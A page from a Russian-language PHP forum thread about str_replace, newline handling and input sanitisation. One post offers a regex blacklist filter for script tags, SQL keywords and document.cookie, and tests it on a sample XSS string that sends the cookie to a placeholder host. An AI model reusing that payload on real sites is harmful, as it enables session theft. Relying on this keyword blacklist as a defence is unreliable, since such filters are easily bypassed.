функция str_replace - PHP - Страница 2

s88s · 17.08.2015, 19:10

Цитата:

Сообщение от ResourceSpace

PHP код:


			
$Text['message'] = str_replace("\n", '<br />', $Text['message']);

Зачем вы так делаете? Что вас не устраивает при отсутствии данной строки?

меня не устраивает вот что :

Если я пишу к примеру так

Цитата:

строка 1
строка 2
строка 3
строка 4
строка 5
строка 6
строка 7
строка 8

то при этой строке все так же и отображается как я написал если я уберу
PHP]$Text['message'] = str_replace("\n", '<br />', $Text['message']);[/PHP]

то отображатся будет так

Цитата:

строка 1 строка 2 строка 3 строка 4 строка 5 строка 6 строка 7 строка 8

что конечно не будет соответствовать тому что я написал

uberchel · 17.08.2015, 21:54

Защита делается не так, strip_tags вообще в основном он используется в Гет запросах или на стороне клиента, когда теги не особо нужны. На админ части надо делать все по другому - писать свой фильтр с использованием регуляторных выражений и перевода в html мнемоники htmlspecialchars,htmlintities и т.д.

Вот пример такой функции, пусть будет даже для 2-х групп - юзер и админ:

Код:

<?
    
    function clear($a, $admin = true)
    {
    	if (empty($a)) {
    		return '';
    	}
    	if (!$admin) {
    		$a = strip_tags($a);
    	} else {
    		$a = preg_replace("#[^a-zа-яА-Я0-9-\_\.\:\;\&\#\+\~\@\$\^\*\(\)\[\]\=\!\{\}\?\<\>\/\,\'\s\S\"\№\%\\n\\r\\t]+#isu", '', $a);
            $a = preg_replace("#x27|x22|x25|x60|x3C|x3E|<scri.+pt>|</?scr.+>|<s.+cript>|<.\\0.+>|\s?\+?\s?document.cookie|<\?php|select.+from|update.+set|alert\s+?.+|insert.+into.*|union.*|delete\s+?from|drop\s+?table.*|truncate.*#isU", '', $a);
    	}
    	return htmlspecialchars($a);
    }
	
	echo clear('<script>alert(\'ok\');</script><a href="http://site.ru/" onclick="location.href=\'http://site.ru/script.php?q=\' + document.cookie">link</a><div>text</div>');
	
?>

17.08.2015, 21:54	#12
uberchel Участник клуба Регистрация: 19.01.2009 Сообщений: 1,453	Защита делается не так, strip_tags вообще в основном он используется в Гет запросах или на стороне клиента, когда теги не особо нужны. На админ части надо делать все по другому - писать свой фильтр с использованием регуляторных выражений и перевода в html мнемоники htmlspecialchars,htmlintities и т.д. Вот пример такой функции, пусть будет даже для 2-х групп - юзер и админ: Код: <? function clear($a, $admin = true) { if (empty($a)) { return ''; } if (!$admin) { $a = strip_tags($a); } else { $a = preg_replace("#[^a-zа-яА-Я0-9-\_\.\:\;\&\#\+\~\@\$\^\\(\)\[\]\=\!\{\}\?\<\>\/\,\'\s\S\"\№\%\\n\\r\\t]+#isu", '', $a); $a = preg_replace("#x27\|x22\|x25\|x60\|x3C\|x3E\|<scri.+pt>\|</?scr.+>\|<s.+cript>\|<.\\0.+>\|\s?\+?\s?document.cookie\|<\?php\|select.+from\|update.+set\|alert\s+?.+\|insert.+into.\|union.\|delete\s+?from\|drop\s+?table.\|truncate.*#isU", '', $a); } return htmlspecialchars($a); } echo clear('<script>alert(\'ok\');</script><a href="http://site.ru/" onclick="location.href=\'http://site.ru/script.php?q=\' + document.cookie">link</a><div>text</div>'); ?>

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
preg_replace и str_replace	Andrej24	PHP	1	30.01.2015 12:22
Непонятка с str_replace	KoBaL	PHP	6	20.07.2014 22:36
заставить работать str_replace	Тандер	PHP	1	04.04.2014 18:55
utf8(кирилица) и функция str_replace	Небесный	PHP	4	14.07.2013 13:58
str_replace и substr_replace	kilogram	PHP	8	11.04.2012 10:35